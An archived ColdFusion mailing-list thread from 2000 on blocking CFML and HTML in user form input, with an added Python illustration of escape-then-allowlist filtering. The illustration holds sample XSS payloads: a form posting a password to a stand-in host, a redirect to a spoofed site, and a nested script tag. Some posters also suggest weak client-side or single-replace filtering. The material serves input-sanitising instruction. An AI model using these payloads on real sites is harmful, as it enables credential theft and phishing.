The easy way out: HTMLCodeFormat() before you insert into the DB. This will
replace all special characters with their entity refs (&lt; etc.).
Yes, there is a reason to prohibit some HTML tags. What if a malicious user
inserts the HTML/JS for a self-submitting form? Or, a la an old Hotmail hack,
they insert a simple JavaScript redirect to a spoofed site that asks the
user to provide personal information.....
You could allow them to use a few of your own proprietary tags. UBB does
this. Say you only want to allow <p>: you can tell the user to insert a
paragraph break, use [[p]] and strip out everything else. Look for a
custom tag if you are going to try and remove all HTML code though; it can
get very tricky (the regexes).
-S
___________________________________________
Sean Brown <[EMAIL PROTECTED]>
http://www.westcar.com/
"Either way you get your dog back"
-Anonymous
___________________________________________
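The approach Sean describes above (entity-encode everything, then let through only your own [[p]]-style markers) written out as an added Python illustration, not ColdFusion code and not from the original thread. The sample payloads, the [[b]]/[[/b]] markers and the naive_strip_tags() function are constructed here to show the difference between escape-then-allowlist and the regex-stripping approach he warns is tricky:

```python
import html
import re

# Constructed sample payloads of the kind the post warns about (assumed, not
# taken from the page): a self-submitting form, a JavaScript redirect, and a
# nested tag built to survive a naive strip.
SAMPLES = {
    "form": '<form action="http://evil.example/steal" method="post">'
            '<input name="pw"></form><script>document.forms[0].submit()</script>',
    "redirect": '<script>location.href="http://spoofed.example/login"</script>',
    "nested": "hello <scr<script>ipt>alert(1)</script> world",
}

# Proprietary markers and the only HTML they may produce. [[p]] is the marker
# the post mentions; [[b]]/[[/b]] are assumed extras for illustration.
ALLOWED_MARKERS = {
    "[[p]]": "<p>",
    "[[b]]": "<b>",
    "[[/b]]": "</b>",
}


def encode_for_storage(text: str) -> str:
    """Escape every HTML-significant character before the value is stored.
    Plays the role HTMLCodeFormat()/HTMLEditFormat() play in CF: '<' becomes
    '&lt;', so nothing the user typed can be parsed as markup later."""
    return html.escape(text, quote=True)


def render_with_markers(stored: str) -> str:
    """Turn already-escaped text back into the limited markup we allow.
    Only exact marker strings are translated; a literal '<' the user typed is
    already '&lt;' and stays that way."""
    out = stored
    for marker, tag in ALLOWED_MARKERS.items():
        out = out.replace(marker, tag)
    return out


def naive_strip_tags(text: str) -> str:
    """'Strip out everything else' done as a blocklist regex in one pass.
    Included to show why the post calls the regex route tricky: removing an
    inner <script> tag can splice the surrounding text into a new one."""
    return re.sub(r"</?script[^>]*>", "", text, flags=re.IGNORECASE)


def contains_markup(rendered: str) -> bool:
    """True if any tag other than the allowlisted ones survives in the output."""
    allowed = set(ALLOWED_MARKERS.values())
    return any(tag not in allowed for tag in re.findall(r"<[^>]*>", rendered))


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        safe = render_with_markers(encode_for_storage(payload))
        print(f"{name:9} escape+allowlist -> markup left: {contains_markup(safe)}")
    stripped = naive_strip_tags(SAMPLES["nested"])
    print(f"nested    naive strip      -> {stripped!r}, markup left: {contains_markup(stripped)}")
    print(render_with_markers(encode_for_storage("[[p]]Hi <b>there</b>")))
```

The order matters: escaping happens first and the marker-to-tag mapping runs over the escaped string, so the only way for a real tag to appear in the output is through the mapping table. Whether you escape before the INSERT, as the post suggests, or at output time, the two functions are the same; the nested sample is what makes the single-pass strip fail, because deleting the inner `<script>` leaves `<scr` and `ipt>` adjacent.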
-----Original Message-----
From: Todd Ashworth [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 09, 2000 2:03 PM
To: [EMAIL PROTECTED]
Subject: Re: CFML be gone!
Wouldn't that show up in the text though? Also, when the text is dumped to
the page, wouldn't the </cf ... > without a <cf ... > throw an error? Of
course, I guess that's what they get for not following instructions anyway.
.Todd
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, May 09, 2000 12:02 PM
Subject: Re: CFML be gone!
|
| You can do a search on <cf and change it to &lt;cf
|
| That should get rid of any CF code they may try to submit.
|
| --Katrina
|
| ====================
| Katrina Chapman
| Consultant
| Ameriquest Mortgage
|
|
|
| From: "David Berger" <djb194@hotmail.com>
| To: [EMAIL PROTECTED]
| cc:
| Subject: Re: CFML be gone!
| Date: 05/09/00 07:45 AM
| Please respond to cf-talk
|
| You can write your own custom form validation with JavaScript. Nothing good
| comes easy!
|
| ________________________________________________________________________
| Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
|
| ------------------------------------------------------------------------------
| Archives: http://www.eGroups.com/list/cf-talk
| To Unsubscribe visit
| http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
| send a message to [EMAIL PROTECTED] with 'unsubscribe' in
| the body.